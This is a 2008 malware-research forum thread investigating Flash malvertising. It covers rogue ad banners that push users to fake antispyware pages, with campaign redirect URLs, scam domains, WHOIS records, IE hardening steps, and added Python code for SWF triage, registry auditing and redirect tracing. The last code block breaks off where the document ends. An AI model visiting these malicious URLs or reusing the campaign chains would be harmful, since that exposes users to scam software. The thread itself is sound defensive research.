Full Version: Flash Mystery
B.I.S.S. Forums > Malware Research Forum > Malware Playground
Kimberly
<h4>
Google AdSense
</h4>
Two days ago a particular post caught my attention. Please take some time to read and analyse every phrase in depth. Bold emphasis is mine; the bolded words are the keywords that reveal the reason for this write-up.

An Apology and a Request for Help.
QUOTE
Over the weekend, on Saturday, April 5, 2008, one of our features, I is Stewpid, hit the Digg.com front page. Though we have been there before, this instance was unique in that a few spyware redirects (from TheMishMash.com, not Digg.com) were reported.

We hoped to draw attention to these reports for two reasons:

1. We hate spyware too and we wanted to apologize to the affected users; and

2. We are not tech-savvy and we need help finding out how this happened. We DON'T want it happening again.

For you sleuths then, here is what we know:

a. First, our website is run and hosted on TypePad, a reputable and easy-to-use blogging platform.

b. The number of visitors affected was small. Though on Saturday and Sunday our approximate pageviews exceeded 170,000, there were only 35 to 40 comments/complaints about spyware, pop-ups, redirects, etc. In fact, none of us here could recreate the problem.

c. According to some Digg reader comments, affected users, after visiting the I is Stewpid page, were presented with a misleading popup. It further appears that a few were then directed to (DO NOT VISIT) imunizator.com. One Digg user mentioned as a possible cause "an .swf file from [again DO NOT VISIT] promoplexer.com." A third user said he/she was redirected to [DO NOT VISIT] antispywaredeluxe.com.

d. Shortly after we learned what was reported, we immediately contacted Google AdSense, a TheMishMash.com advertising provider, and requested assistance. We further blocked AdSense from displaying ads from imunizator.com, promoplexer.com and antispywaredeluxe.com. We do not, however, yet know whether any even advertise on AdSense.

e. The problem seemed to affect only visitors coming from Digg.com.

f. To our knowledge we have never approved pop-up advertising, whether through AdSense or otherwise, though we intend on Monday to verify that.

Obviously we have no idea at this point who, if anyone, or what, was to blame. It very well could have been something we did wrong; we just don't yet know.

The long and short of it? To the Digg users who were affected, we are sorry. To those readers with expertise and/or experience in these matters, help. Any suggestions, further information, clues, etc. are appreciated.
Everyone reading these pages and Sandi's blog will know the meaning of most of the bolded words and symptoms, except maybe for Google AdSense. Why did I include it?

If you visit the TheMishMash homepage, you will see a Flash animation on the right side and/or after the first blog post, so your thought will be "Hey dude, that was a quick one to figure out". Well, it isn't, because if you take a peek at the source code of the page you'll notice that they don't serve any ads besides the Google AdSense ones.

Very important note: Below are some screenshots, but the SWF file displayed is NOT malicious; it only serves for illustration purposes.

Google advertisements are very hard to track; it's not like a banner hosted at site X or Y with a nice .swf extension. I will not explain the mechanism in depth, but you get a JS script from ad.afy11.net which contains the necessary details to display the advertisement in a "placeholder".

pagead2.googlesyndication.com/pagead/flash_ad_relay.swf is the placeholder and pagead2.googlesyndication.com/pagead/imgad?id=[removed by me] is the Flash animation in this case.

No extension, no relevant name ... very difficult to spot something or to get the Flash file scanned.

Since links inside malicious banners are encrypted and their click tag often redirects to the real site (emusic, colgate ...), fine-tuning advertising in your AdSense panel will have little or no effect, because these types of malverts don't come directly from imunizator.com, promoplexer.com, etc ...

The impact of them eventually being seen in Google AdSense is huge; a lot of websites use Google Ads. Many of them only allow text-based ads, which is good; others have only images, and they represent a certain "danger"...

It isn't the first time that bad things happen through Google advertising, and it certainly will not be the last time. I kinda suspected this way back by reading some reports on forums, but it's the first time I came across a website which exclusively uses Google adverts.

Unfortunately I don't have any captures of malicious banners being shown through Google AdSense, so I can't prove anything 100% for sure right now. Maybe the people who got hit at TheMishMash used a proxy or Tor, one never knows.

One thing is important right now, no matter if you are an advertiser, an admin or a simple user, just keep your eyes wide open please. When you are a victim of a redirect, let us know, provide as much details as possible.

Thanks.
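Added example, not part of Kimberly's post: the point above is that a Google-served Flash creative arrives via pagead/imgad?id=... with no .swf extension and no meaningful name, so triage has to identify it by content. The Python below sniffs the three SWF signatures (FWS, CWS, ZWS), inflates a zlib-compressed CWS body, checks the declared length against what was actually received, and pulls out URL strings and redirect-related markers (getURL, crossdomain.xml, campaign= and the like that appear throughout this thread). The sample SWF is constructed inline: a fake tag stream carrying the promoplexer.com campaign URL quoted elsewhere in the thread wrapped in a real CWS header. Real malvert creatives usually obfuscate their targets, so an empty result is not a clean bill of health; a hit is a reason to look further.

```python
"""Identify and triage a Flash file by content, not by URL or extension."""
import re
import struct
import zlib

SWF_MAGICS = {b"FWS": "uncompressed", b"CWS": "zlib", b"ZWS": "lzma"}

# Strings a plain banner has no business containing unless it redirects or phones home.
SUSPICIOUS = (b"getURL", b"loadMovie", b"LoadVars", b"crossdomain.xml",
              b"campaign=", b"statsa.php", b"in.cgi")

URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")


def sniff_swf(data: bytes):
    """Return (compression, version, declared_length) for a SWF, or None."""
    if len(data) < 8:
        return None
    kind = SWF_MAGICS.get(bytes(data[:3]))
    if kind is None:
        return None
    version = data[3]
    declared_len = struct.unpack("<I", data[4:8])[0]  # uncompressed size incl. 8-byte header
    return kind, version, declared_len


def swf_body(data: bytes) -> bytes:
    """Return the decompressed tag stream that follows the 8-byte header."""
    info = sniff_swf(data)
    if info is None:
        raise ValueError("not a SWF file")
    kind, _, declared_len = info
    if kind == "uncompressed":
        body = data[8:]
    elif kind == "zlib":
        body = zlib.decompress(data[8:])
    else:
        raise NotImplementedError("ZWS (LZMA) SWF: inflate with an LZMA-aware tool first")
    if len(body) + 8 != declared_len:
        # Truncated download or a crafted header; either way worth noting.
        raise ValueError(f"declared length {declared_len} != actual {len(body) + 8}")
    return body


def extract_urls(data: bytes):
    """All http(s) URLs stored as plain strings in the tag stream, sorted."""
    return sorted({m.decode("ascii", "replace") for m in URL_RE.findall(swf_body(data))})


def suspicious_markers(data: bytes):
    """Which redirect/phone-home markers occur in the tag stream."""
    body = swf_body(data)
    return [s.decode() for s in SUSPICIOUS if s in body]


def build_sample_cws(body: bytes, version: int = 8) -> bytes:
    """Constructed fixture: wrap an arbitrary byte string in a CWS header."""
    return b"CWS" + bytes([version]) + struct.pack("<I", len(body) + 8) + zlib.compress(body)


# Constructed sample body. A real tag stream is binary, but a redirecting banner
# stores the campaign URL it calls as a NUL-terminated string, which is what
# this triage looks for.
SAMPLE_BODY = (
    b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00\x00\x0c\x01\x00"            # fake frame header bytes
    + b"\x96\x2c\x00\x00http://adtds2.promoplexer.com/statsa.php?campaign=mark\x00"
    + b"\x83getURL\x00\x00"
)
SAMPLE_SWF = build_sample_cws(SAMPLE_BODY)

if __name__ == "__main__":
    print(sniff_swf(SAMPLE_SWF))
    print(extract_urls(SAMPLE_SWF))
    print(suspicious_markers(SAMPLE_SWF))
```

To use it on a captured creative, save the bytes the browser fetched from the imgad?id=... URL and pass them to extract_urls() and suspicious_markers(); sniff_swf() returning None on what the page claims is a Flash ad is itself a finding.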
Kimberly
<h4>
New Banner
</h4>
A new banner we had never seen before showed up. A couple of screenshots below.
Banner.
content.yieldmanager.edgesuite.net/atoms/e7/72/8c/59/e7728c59d4060354dfcdc9eb045b6995.swf
Campaign.
staticglobalsources.com/crossdomain.xml

staticglobalsources.com/c/index.php?id=d1BMYXJCR0gzcHJDaW5rS0NkQzVoPTEyMDgyNzE0ODEmcG56Y252dGE9cWJ6dmm7NkiZuYXFlbAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=domisandry&adid=intl
______________________________

The malicious banner is an advertisement for Driveway.com, an Online File Sharing website to send large files.
Kimberly
<h4>
www.clubic.com & www.jeuxvideo.fr - Colgate
</h4>
Colgate banner going live on the French websites www.clubic.com and www.jeuxvideo.fr. The banner was first reported on 14th April 2008 by Sandi.

Screenshots in situ.
Note: The redirect occurs immediately, as the malicious banner is present on the homepage.

Banner.
im2.smartadserver.com/272091/maxfresh_300x250_mark.swf
Campaign.
adtds2.promoplexer.com/statsa.php?campaign=mark&u=1208537690314
We also hit www.adsraise.com/mbuyers/statistics.html
Kimberly
<h4>
community.livejournal.com
</h4>
Reported by Sandi here.
Banner.
sixapart-images.adbureau.net/sixapart/041808_728x90_765.swf
Campaign.
statgroup.net/crossdomain.xml
statgroup.net/c/index.php?id=[removed]
profitabill.com/?cmpid=andirector&adid=x
prevedmarketing.com/?tmn=mwatmp&aid=andirector&lid=x&ax=1&ed=2&mt_info=5951_7523_2358
scanner2.malware-scan.com/18_swp/?tmn=null&aid=andirector_ma18s_mb1t&lid=x&affid=&ax=1&ed=2&mt_info=5951_7523_2358:3958_0_15359&rdr=1
bucksbill.com/.stats/refil.php?p=18&aid=andirector_ma18s_mb1t&lid=x&affid=keyin
statsgod.com/a/?lang=en&aid=andirector_ma18s_mb1t&lid=x&affid=keyin&prod_id=655&ref=
Not only did I get hit by Malware Alarm, but I also got a "prompt" for Spy-Shredder.
<h4>
profitabill.com - 80.86.84.191
</h4>
Website Title: None given
ICANN Registrar: ENOM, INC.
Created: 2008-03-25
Expires: 2009-03-25
Name Server: NS1.PROFITABILL.COM (has 1 domains)
Name Server: NS2.PROFITABILL.COM
Name Server: NS3.PROFITABILL.COM
Name Server: NS4.PROFITABILL.COM
Whois Server: whois.enom.com
Server Type: nginx
IP Location - Berlin - Berlin - Webperoni Gmbh Server Hosting
Dedicated Hosting: profitabill.com is hosted on a dedicated server

Registrant Contact:
noo
Serg Moons
moon.serg(at)gmail.com
+1.123456
Fax: +1.123456
st.1st
as, CA 90210
US
______________________________

You may notice that this time the domain is registered by Serg Moons aka "noo" and not Serge Moon as we saw on Mar 12 2008. The email addy is identical.
Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

"Serg Moon" owns about 19 other domains
moon.serg@gmail.com is associated with about 28 domains
profitabill.com
Registrant Contact:
noo
Serg Moons
moon.serg(at)gmail.com
+1.123456
Fax: +1.123456
st.1st
as, CA 90210
US

"noo" owns about 73 other domains
moon.serg(at)gmail.com is associated with about 91 domains
<h4>
moon.serg(at)gmail.com
</h4>
He sure is a busy person. We already found 28 IPs in March. Below is a list of domains registered on the same date as profitabill.com.

83.149.115.150
  1. Adsadvertisment.com
  2. Advertismentad.com
  3. Advertprofit.net
  4. Bizadsonline.net
  5. Bizadvert.net
  6. Centsprofit.com
  7. Clickcentral.net
  8. Clicksapce.com
  9. Connectionclick.net
  10. Greatad.net
  11. Greatprofit.net
  12. Marketingstorage.net
  13. Marketmediapro.net
  14. Marketonlineget.net
  15. Prevedcentral.net
  16. Revenueexplorer.net
  17. Securityclick.net
  18. Virtualcoin.net
  19. Webpreved.com
28 + 19 for moon.serg(at)gmail.com (19/73 for "noo") ... Still way to go; but maybe I might digg up some more in the upcoming days ... who knows.
Kimberly
<h4>
statsgod.com - 84.243.253.220
</h4>
Hmm, I noticed I never really looked at statsgod.com before, so here's the listing. On Dec 21 2007 we already had the first 8 domains sitting on the same IP.

ICANN Registrar: TUCOWS INC.
Created: 2007-05-18
Expires: 2008-05-18
Name Server: NS1.STATSGOD.COM (has 1 domains)
Name Server: NS2.STATSGOD.COM
Whois Server: whois.tucows.com
Server Type: lighttpd/1.4.13
IP Location - Noord-holland - Amsterdam - Gfx-cust-worldstream

Registrant:
Statsgod Inc.
5439 Leesburg Park
Arlington, VA 22201
US

Domain name: STATSGOD.COM

Administrative Contact:
Hostmaster, Statsgod Inc.
5439 Leesburg Park
Arlington, VA 22201
US
(703) 379-0588

Domain servers in listed order:
NS1.STATSGOD.COM 84.243.253.219
NS2.STATSGOD.COM 84.243.253.216

Websites.
  1. Anonymbrowser.com
  2. Blablahost.com
  3. Errordigger.com
  4. Errorinspector.com
  5. Internetsupernanny.com
  6. Passwordinspector.com
  7. Performanceoptimizer.com
  8. Sellmosoft.net
  9. Statsgod.com
<h4>
profitabill.com NS servers
</h4>
ns1.profitabill.com 208.79.82.50
http://www.robtex.com/ip/208.79.82.50.html

ns2.profitabill.com 208.79.82.66
http://www.robtex.com/ip/208.79.82.66.html

ns3.profitabill.com 77.73.98.2
http://www.robtex.com/ip/77.73.98.2.html

ns4.profitabill.com 77.73.98.4
http://www.robtex.com/ip/77.73.98.4.html

<h4>
Spot the difference ...
</h4>
I need a Whois break because my head is spinning. Sandi called them lazy ... let's add rippers to that. I found some of the real banners a few days ago. Left side is the fake / bad advertisement, right side is the real advertisement. Spot the difference, like they say ...
Kimberly
<h4>
scan.antispywaredeluxe.com - 67.205.93.97
</h4>
Another change very soon?

scan.antispywaredeluxe.com/scan.php?landid=[removed]&depid=[removed]&cid=[removed]&parid=[removed]&bs=[removed]1&lang=[removed]
scan.antispywaredeluxe.com A 67.205.93.97
antispywaredeluxe.com A 67.205.75.9
ns1.us.editdns.net 74.52.212.235
ns2.us.editdns.net 72.249.105.234
ns3.us.editdns.net 64.251.10.77
ns.antispywaredeluxe.com 67.205.75.9
Kimberly
<h4>
Resurrected banner
</h4>
Reported by Sandi.
Campaign.
burnads.com/crossdomain.xml
burnads.com/stats.php?campaign=heldthin&u=[removed]
<h4>
Check your ActiveX settings
</h4>
A Google search revealed quite a few people who actually got this scam installed. Some websites push the install of an ActiveX control before triggering the download of a file. Do not accept the install of the ActiveX control and cancel the download of the file. Don't see any of the prompts below? It's time to check your Internet Explorer settings then.
Check and secure your Internet Explorer.
  1. From within Internet Explorer click on the Tools menu and then click on Options.
  2. Click on the Security tab
  3. Click the Internet icon so it becomes highlighted.
  4. Click on Default Level and click Ok.
  5. Click on the Custom Level button.
    • Change the Download signed ActiveX controls to Prompt.
    • Change the Download unsigned ActiveX controls to Disable.
    • Change the Initialise and script ActiveX controls not marked as safe to Disable.
    • Change the Launching applications and unsafe files to Prompt.
    Additional security settings.
    • Change the Installation of desktop items to Prompt.
    • Change the Launching programs and files in an IFRAME to Prompt.
    • Change the Navigate sub-frames across different domains to Prompt.
    • Change the Software channel permissions to Medium Safety.
    • Internet Explorer 7 users: Check all other items and make sure that they meet the (recommended) setting where applicable.
    • When all these settings have been made, click on the OK button.
    • If it prompts you as to whether or not you want to save the settings, press the Yes button.
  6. Next press the Apply button and then the OK to exit the Internet Properties page.
How to Configure Enhanced Security Features for Internet Explorer from Windows XP SP2.

Just as a reminder ... these redirects affect ALL browsers (Firefox, Opera, Internet Explorer ... Mac users) so check your settings and take the appropriate steps.
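Added example, not code from the post: the Internet Explorer settings listed above are stored under HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 as DWORD values named by URL-action ID (1001, 1004, 1201, ...) with 0 = Enable, 1 = Prompt, 3 = Disable. The Python below parses a `reg export` of that key and reports every setting that deviates from the recommendations in the post, so you can check a box without clicking through the dialog. The sample export is constructed. The action IDs and the 0/1/3 encoding are Microsoft's documented ones; the 1E05 software-channel encoding (0x10000 High, 0x20000 Medium, 0x30000 Low) is assumed from that same documentation and should be verified on your build.

```python
"""Audit Internet-zone URL actions from a `reg export` of Zones\\3."""
import re

ENABLE, PROMPT, DISABLE = 0, 1, 3          # DWORD values IE uses for URL actions

# URL-action IDs for the Internet zone and the settings recommended above.
RECOMMENDED = {
    "1001": ("Download signed ActiveX controls", PROMPT),
    "1004": ("Download unsigned ActiveX controls", DISABLE),
    "1201": ("Initialize and script ActiveX controls not marked as safe", DISABLE),
    "1806": ("Launching applications and unsafe files", PROMPT),
    "1800": ("Installation of desktop items", PROMPT),
    "1804": ("Launching programs and files in an IFRAME", PROMPT),
    "1607": ("Navigate sub-frames across different domains", PROMPT),
}
# Software channel permissions use a level, not Enable/Prompt/Disable.
# Assumed encoding (verify on your build): 0x10000 High, 0x20000 Medium, 0x30000 Low.
SOFTWARE_CHANNEL = "1E05"
CHANNEL_LEVELS = {0x10000: "High safety", 0x20000: "Medium safety", 0x30000: "Low safety"}
CHANNEL_WANTED = 0x20000

REG_DWORD_LINE = re.compile(r'^"(?P<name>[0-9A-Fa-f]{4})"=dword:(?P<val>[0-9A-Fa-f]{8})$')


def parse_zone_export(text):
    """Map URL-action IDs to integers from lines like "1001"=dword:00000001."""
    values = {}
    for line in text.splitlines():
        m = REG_DWORD_LINE.match(line.strip())
        if m:
            values[m.group("name").upper()] = int(m.group("val"), 16)
    return values


def audit_zone(values):
    """Return [(action_id, description, current, wanted)] for every deviation.

    A missing value is reported too: the zone template then decides, and an
    ActiveX-pushing landing page counts on exactly that.
    """
    findings = []
    for action, (desc, wanted) in RECOMMENDED.items():
        current = values.get(action)
        if current != wanted:
            findings.append((action, desc, current, wanted))
    chan = values.get(SOFTWARE_CHANNEL)
    if chan is None or chan > CHANNEL_WANTED:          # higher value = less safety (assumed)
        findings.append((SOFTWARE_CHANNEL, "Software channel permissions",
                         CHANNEL_LEVELS.get(chan, chan), CHANNEL_WANTED))
    return findings


def read_live_zone():
    """Read the live key on Windows; returns None where winreg is unavailable."""
    try:
        import winreg
    except ImportError:
        return None
    path = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"
    values, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        while True:
            try:
                name, data, kind = winreg.EnumValue(key, i)
            except OSError:          # no more values
                return values
            if kind == winreg.REG_DWORD:
                values[name.upper()] = data
            i += 1


# Constructed sample: a zone where signed ActiveX downloads are still Enabled
# and software channel permissions sit at Low safety.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"1001"=dword:00000000
"1004"=dword:00000003
"1201"=dword:00000003
"1806"=dword:00000001
"1800"=dword:00000001
"1804"=dword:00000001
"1607"=dword:00000001
"1E05"=dword:00030000
"""

if __name__ == "__main__":
    live = read_live_zone()
    for action, desc, current, wanted in audit_zone(live or parse_zone_export(SAMPLE_EXPORT)):
        print(f"{action} {desc}: is {current!r}, want {wanted!r}")
```

On the machine to check, run `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" zone3.reg` and feed the file to parse_zone_export(); on Windows with winreg available, read_live_zone() reads the key directly. Zone 3 is the Internet zone only; a site the scam has managed to push into Trusted Sites (zone 2) is not covered by this check.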
Kimberly
<h4>
Lady SpeedStick "overflow"
</h4>
Lady SpeedStick malvert at it again on Yahoo - caught by Sandi.

References.

http://msmvps.com/blogs/spywaresucks/archi...26/1604820.aspx
http://msmvps.com/blogs/spywaresucks/archi...26/1605158.aspx
http://msmvps.com/blogs/spywaresucks/archi...26/1605247.aspx

Yahoo redirects are not recent; a Google search reveals a lot of victim posts, and I also asked for feedback a couple of months ago - Ref.
QUOTE
traveltray.com/swf/gnida.swf?campaign=upmorpheus&u=1201009699
Reported at forum.zeusnews.com - forum.ingegneri.info.
Banned Country Codes - States / Cities - IP Ranges
217.12.0.0-217.12.255.255 (Yahoo Europe)
216.109.0.0-216.109.255.255 (us.rd.yahoo.com - 216.109.118.82)
66.94.0.0-66.94.25.255 (f3.yahoofs.com - 66.94.226.22)
UK
california
milano, milan, london, dublin, barcelona
In different countries (France, Italy ...) people complain about SWF redirects in their mailbox. If you are a victim of this, please contact us.
As the title says, we got an overflow of that advertising banner, it popped up everywhere in the last weeks.
______________________________

I'm curious; I often read my own notes in order to see if I didn't omit a detail or simply to refresh my memory, and today, dunno why, some things in the URLs started to catch my attention.
imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ReachWe_LB_10981A/123_728x90.swf

nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_Getfreecar_LBLINT_2_8671/gfc_728x90.swf

nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_GetFreeCar_LBLINT_6_8671/getfreecar728x90_REVISED_07052006.swf

63.225.61.4:8080/ads/Forceup/onentirely728x90.swf

imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ReachWe_LB_10981A/123_728x90.swf
<h4>
ReachWe
</h4>
ReachWe ...

From: New Type Of Fraud: Fake Advertisers
QUOTE
Greetings,

My name is Frank Collins, my position is Director of Media Purchases. I am writing you on behalf of an Advertising Agency "ReachWe", with headquarters in Geneve, Switzerland. We are currently in the process of developing alternative sources of traffic for our clients. Our objective, much like yours, is to help our clients reach their marketing goal and provide them with the best media coverage of their products or service available on the Web.

At present we want to utilize target markets of North America, United Kingdom and Australia. In addition to these markets we strongly work with Western Europe and might be interested in Asian Markets. We would like to hear more about your traffic details, available media objects and prices. Given this information we will be able to choose the best client for a possible campaign.

The budgets for our campaigns are usually very flexible. Some of our key partners are names like: FedEx, Expedia, Avon, and Bosch to name a few. You will find my contact information below. Thanks for your time and consideration.

Frank Collins,
Director of Media Purchases
ReachWe LLC.
http://reachwe.com/
Rue Plantamour 25
1201 Geneve, Switzerland
Reachwe.com - 203.142.29.76

Website Title: Reach Western Europe - Advertising Agency
ICANN Registrar: TUCOWS INC.
Created: 2007-12-06
Expires: 2008-12-06

Name Server: NS1.HOSTICA.COM (has 15,943 domains)
Name Server: NS2.HOSTICA.COM
Name Server: NS3.HOSTICA.COM
Whois Server: whois.tucows.com

Server Type: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
IP Location - Hong Kong (sar) - Hong Kong - Webvisions (hong Kong) Ltd

Registrant:
Sphere
Falores
Athens, NA NA
GR

Domain name: REACHWE.COM

Administrative Contact:
Martin, Sten smith.realty@yahoo.com
Falores
Athens, NA NA
GR
+46.348675543 Fax: +46.348675543

Technical Contact:
Administration, Domain billing@hostica.com
21143 Hawthorne Blvd. #442
Torrance, CA 90503-4615
US
+1.3102120190 Fax: +1.8667684101

Registration Service Provider:
Hostica.Com, support@hostica.com
+1.3102120190
+1.8667684101 (fax)
http://www.hostica.com
Please contact for help regarding your Domain

Registrar of Record: TUCOWS, INC.
Record last updated on 06-Dec-2007.
Record expires on 06-Dec-2008.
Record created on 06-Dec-2007.

Domain servers in listed order:
NS2.HOSTICA.COM
NS3.HOSTICA.COM
NS1.HOSTICA.COM

Registrant Search:
  • "Sphere" owns about 55 other domains
Email Search:
  • smith.realty@yahoo.com is associated with about 9 domains
  • billing@hostica.com is associated with about 7,490 domains
  • support@hostica.com is associated with about 19,054 domains
______________________________

These variables include:
  • state
  • city area
  • day
  • hour
  • browser type
  • operating system
  • domain name
  • IP
  • Language
Huhu ... sounds familiar, ain't it?
What worries me ...
  • Mobile Marketing
  • WAP Media
  • SMS Marketing
  • Premium SMS, short codes and keywords
  • Bar Code technology via SMS
  • Mobile-enabled online ad units
Websites.
  1. P-mediaonline.com
  2. Reachwe.com
<h4>
New kid on the block - P-mediaonline.com
</h4>
P-mediaonline.com - 203.142.29.76

Website Title: Reach Western Europe - Advertising Agency
ICANN Registrar: ENOM, INC.
Created: 2008-04-07
Expires: 2009-04-07

Name Server: NS1.HONGKONG5.COM (has 95 domains)
Name Server: NS2.HONGKONG5.COM
Whois Server: whois.enom.com

Server Type: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
IP Location - Hong Kong (sar) - Hong Kong - Webvisions (hong Kong) Ltd

Registration Service Provided By: Internet and Software Limited
Contact: info@issltd.biz

Domain name: p-mediaonline.com

Registrant Contact:

Thomas Canbera (lucas.martin68@gmail.com)
+380.14157364859
Fax:
Rue Plantamour 45
South Tahoe, 90001
UA

Administrative Contact:

Thomas Canbera (lucas.martin68@gmail.com)
+380.14157364859
Fax:
Rue Plantamour 45
South Tahoe, 90001
UA

Technical Contact:

Thomas Canbera (lucas.martin68@gmail.com)
+380.14157364859
Fax:
Rue Plantamour 45
South Tahoe, 90001
UA

Name Servers:
NS1.HONGKONG5.COM
NS2.HONGKONG5.COM

Creation date: 07 Apr 2008 08:54:46
Expiration date: 07 Apr 2009 08:54:46

Registrant Search:
  • "Thomas Canbera" owns about 3 other domains
Email Search:
  • info@issltd.biz is associated with about 5,796 domains
  • lucas.martin68@gmail.com is associated with about 1 domain
Err ... looks familiar, no?
<h4>
Reminder
</h4>
  • Check your creative at AdopsTools.
  • Look up in depth the Whois details of the advertising company.
  • Seek / ask for advice and / or help if in doubt. You may contact me or Sandi for example, we don't bite.
Kimberly
<h4>
More ReachWe ... well, sort of
</h4>
Google revealed another reachwe.com email addy and thus another site. First of all something important: the site navigation on Reachwe.com and P-mediaonline.com happens through a Flash file, as a matter of fact. (See screenshots from previous post.) The link in the address bar is very important, as you will notice below.

The Flash file shows Face-It Studio.
"Contact Us" reveals:
  • Reach Western Europe
  • Turebergs Alle
  • Stockholm
  • Sweden
  • Dean Taren - dean@reachwe.com
The homepage is much more questionable...
<h4>
pussy-juice.net - 208.179.130.78
</h4>
Website Title: Free porn video, pictures

ICANN Registrar: TUCOWS INC.
Created: 2007-11-29
Expires: 2008-11-29
Registrar Status: ok
Name Server: NS1.HOSTICA.COM (has 15,943 domains)
Name Server: NS2.HOSTICA.COM
Name Server: NS3.HOSTICA.COM
Whois Server: whois.tucows.com

Server Type: Apache/1.3.41 (Unix) mod_psoft_traffic/0.2 mod_ssl/2.8.31 OpenSSL/0.9.8b
IP Address: 208.179.130.78
IP Location - California - Los Angeles - Jatek Corporation

Registrant:
Pavel Rudenkov
Brighton Beach
New York, NA na
US

Domain name: PUSSY-JUICE.NET

Administrative Contact:
Rudenkov, Pavel smith.realty@yahoo.com
Brighton Beach
New York, NA na
US
+1.2128756783 Fax: +1.2128756783

Technical Contact:
Administration, Domain billing@hostica.com
21143 Hawthorne Blvd. #442
Torrance, CA 90503-4615
US
+1.3102120190 Fax: +1.8667684101

Registration Service Provider:
Hostica.Com, support@hostica.com
+1.3102120190
+1.8667684101 (fax)
http://www.hostica.com
Please contact support@hostica.com for help regarding your Domain
Registration.

Registrar of Record: TUCOWS, INC.
Record last updated on 29-Nov-2007.
Record expires on 29-Nov-2008.
Record created on 29-Nov-2007.

Domain servers in listed order:
NS2.HOSTICA.COM
NS3.HOSTICA.COM
NS1.HOSTICA.COM

Email Search:
  • smith.realty@yahoo.com is associated with about 9 domains
  • billing@hostica.com is associated with about 7,490 domains
  • support@hostica.com is associated with about 19,054 domains
Kimberly
<h4>
www.moli.com - Neopets
</h4>
Two previously unseen malverts, impersonating Neopets, are present on Moli. Moli is an online site for social, business and family networking, like LiveJournal.

Screenshots in situ.
Banners.
atlas-ads.com/23486/728x90.swf
atlas-ads.com/23486/300x250.swf
Campaign.
track.trackads.net/statsa.php?campaign=23486&u=1209339077448
track.trackads.net/swf/gnida.swf?campaign=23486&u=1209339077448&
paramss=[removed]

track.trackads.net/statss.php?campaign=23486&u=1209339077448&
paramss=[removed]

tds.maxconvert.com/?paramss=[removed]
adtds.trackads.net/in.cgi?2&depid=[removed]&cid=[removed]&parid=[removed]&
scan.spywaredestructor.com/scan.php?landid=100&depid=&cid=&parid=&bs=1&lang=en
Both campaigns are the same.

<h4>
atlas-ads.com - 67.205.93.102
</h4>
Website Title: Atlas Solutions - Online Advertising: Advertiser and Publisher Ad Serving Solutions
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-10
Expires: 2009-04-10
Registrar Status: clientTransferProhibited
Name Server: NS1.ATLAS-ADS.COM (has 1 domains)
Whois Server: whois.estdomains.com

Server Type: Microsoft-IIS/6.0
IP Location - Canada - Groupe Iweb Technologies Inc

Domain Name: ATLAS-ADS.COM

Registrant:
Atlas Advertising
Atlas Advertising (support@atlas-ads.com)
Okland
SF
California,10001
US
Tel. +235.122454875
Fax. +235.122454875

Administrative Contact:
Atlas Advertising
Atlas Advertising (support@atlas-ads.com)
Okland
SF
California,10001
US
Tel. +235.122454875
Fax. +235.122454875

Technical Contact:
Atlas Advertising
Atlas Advertising (support@atlas-ads.com)
Okland
SF
California,10001
US
Tel. +235.122454875
Fax. +235.122454875

Billing Contact:
Atlas Advertising
Atlas Advertising (support@atlas-ads.com)
Okland
SF
California,10001
US
Tel. +235.122454875
Fax. +235.122454875

Domain servers in listed order:
ns1.atlas-ads.com

Creation Date: 10-Apr-2008
Expiration Date: 10-Apr-2009

Websites.
  1. Atlas-ads.com
  2. Trackads.net
Don't get fooled when you visit the homepage of atlas-ads.com: they don't have a homepage but redirect you to Atlas Solutions, which is owned by Microsoft.
CODE
Sending request:
GET / HTTP/1.1
Host: atlas-ads.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: close

• Finding host IP address...
• Host IP address = 67.205.93.102
• Finding TCP protocol...
• Binding to local socket...
• Connecting to host...
• Sending request...
• Waiting for response...

Receiving Header:
HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.5-3
Location: http://atlassolutions.com
Content-type: text/html
Content-Length: 0
Connection: close
Date: Mon, 28 Apr 2008 00:31:14 GMT
Server: lighttpd/1.5.0
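Added example, not code from the post: the capture above shows why a tool that follows redirects on its own is the wrong instrument here. atlas-ads.com answers with a 302 to atlassolutions.com from a lighttpd box, and anything that auto-follows ends up looking at Microsoft's site while the hosting and Server header of the hop that matters are lost. The Python walker below records every hop with its status and Server header, detects loops, caps the hop count, and relies on a fetcher that never follows a Location itself (the same request-by-request approach as the capture). The offline fetcher is a constructed response table seeded with the 302 above; the 200 from atlassolutions.com and the loop.example entries are constructed. http_fetch() is the real single-request fetcher for use on a live campaign chain from an isolated machine.

```python
"""Walk a malvert campaign's redirect chain one request at a time."""
from urllib.parse import urljoin, urlsplit

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def follow_chain(start_url, fetch, max_hops=10):
    """Walk Location headers without ever letting the fetcher follow them.

    fetch(url) must return (status, headers) for exactly one request.
    Returns [(url, status, server_header), ...]; a final status of "loop"
    or "max-hops" marks an aborted walk.
    """
    hops, seen, url = [], set(), start_url
    while url is not None:
        if url in seen:
            hops.append((url, "loop", ""))
            break
        if len(hops) >= max_hops:
            hops.append((url, "max-hops", ""))
            break
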